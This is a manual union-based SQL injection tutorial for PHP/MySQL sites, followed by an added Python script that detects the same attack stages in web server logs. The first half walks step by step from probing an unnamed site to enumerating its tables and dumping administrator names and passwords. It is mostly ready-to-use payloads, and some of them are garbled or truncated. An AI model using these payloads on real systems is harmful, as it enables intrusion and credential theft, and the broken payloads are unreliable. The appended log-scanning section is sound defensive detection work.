PHP + MySQL manual injection tutorial
Injection point: xxxxxxx

and 1=1 returns the correct page and and 1=2 returns an error, which confirms the injection point.

+order+by+11 returns the correct page and +order+by+12 returns an error, which indicates that there are 11 fields.

    +union+select+1,2,3,4,5,6,7,8,9,10,11

Note that the value used is -13, which makes the original query report an error; and 1=2 can also be used to report an error.
user() returns the database username, version() the database version, and database() the name of the database currently in use:

    +union+select+1,user(),version(),
Note for version 5.0: the tables can be queried directly. The following lists the tables of the current database directly:

    +union+select+,unhex(hex(GROUP_CONCAT(table_name,10,11+from+information_schema.tables+where+table_schema=database()
Ad_play, banner, baozhi, baozhi_class, flood, cdowns, chengyuan, downs, fuwu, guanyu, guanzhu, jobs, language, link, liuyan, Baidu, member, news, news_class, province, renli, store, store_class, store_class2, store_class3, t_china_class, t_china_store, t_lianxi, t_sts, t_users, t_world_class, t_world_store, video, example, word, works, example, example, zazhi, example, zazhidowns

There is a t_users table, which should be where the administrator account is stored. First convert t_users to hex, then list its columns:

    +union+select+1,2,3,4,unhex(hex(GROUP_CONCAT(column_name))),6,7,8,9,10,11+from+information_schema.columns+where+table_name=0x745F7573657273
Then we query the t_name and t_pass values from t_users:

    +union+select+1,2,3,4,concat(0x3a,t_name,0x3a,t_pass),6,7,8,9,10,11+from+t_users
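
From the defending side, each stage above leaves a recognizable query string in the web server's access log. The following is an added example, not part of the original tutorial: it classifies request targets by stage and groups the stages per client. The log lines, the item.php?id= parameter and the addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signatures for the stages the tutorial walks through, in that order.
STAGES = [
    ("boolean_probe", re.compile(r"\band\s*\d+\s*=\s*\d+")),
    ("column_count", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{4,}\b")),
]
# Common/combined log prefix: client, ident, user, [time], "METHOD target PROTO"
LOG_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*"')

def normalize(query):
    """Decode '+' and %xx twice (double encoding), drop /**/ comments, fold space and case."""
    text = unquote_plus(unquote_plus(query))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def classify(target):
    """Return the stage names whose signature appears in the request's query string."""
    query = normalize(urlsplit(target).query)
    return [name for name, rx in STAGES if rx.search(query)]

def scan(lines):
    """Map each client address to the distinct stages it sent, in first-seen order."""
    seen = {}
    for line in lines:
        m = LOG_RX.match(line)
        if not m:
            continue
        for stage in classify(m.group(2)):
            stages = seen.setdefault(m.group(1), [])
            if stage not in stages:
                stages.append(stage)
    return seen

# Constructed sample lines (documentation addresses, hypothetical item.php?id=).
SAMPLE = [
    '198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /item.php?id=13+and+1=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2024:13:55:41 +0000] "GET /item.php?id=13+order+by+12 HTTP/1.1" 500 87',
    '198.51.100.7 - - [10/Oct/2024:13:56:02 +0000] "GET /item.php?id=-13+union/**/select+1,2,3+from+information_schema.tables HTTP/1.1" 200 640',
    '192.0.2.10 - - [10/Oct/2024:13:56:10 +0000] "GET /item.php?id=13 HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Oct/2024:13:56:12 +0000] "GET /search.php?q=brand+and+order+by+phone HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE).items():
        print(client, "->", ", ".join(stages))
```

A client that shows several stages in sequence is a far stronger signal than any single match, since ordinary search text can contain words such as "and" or "order by".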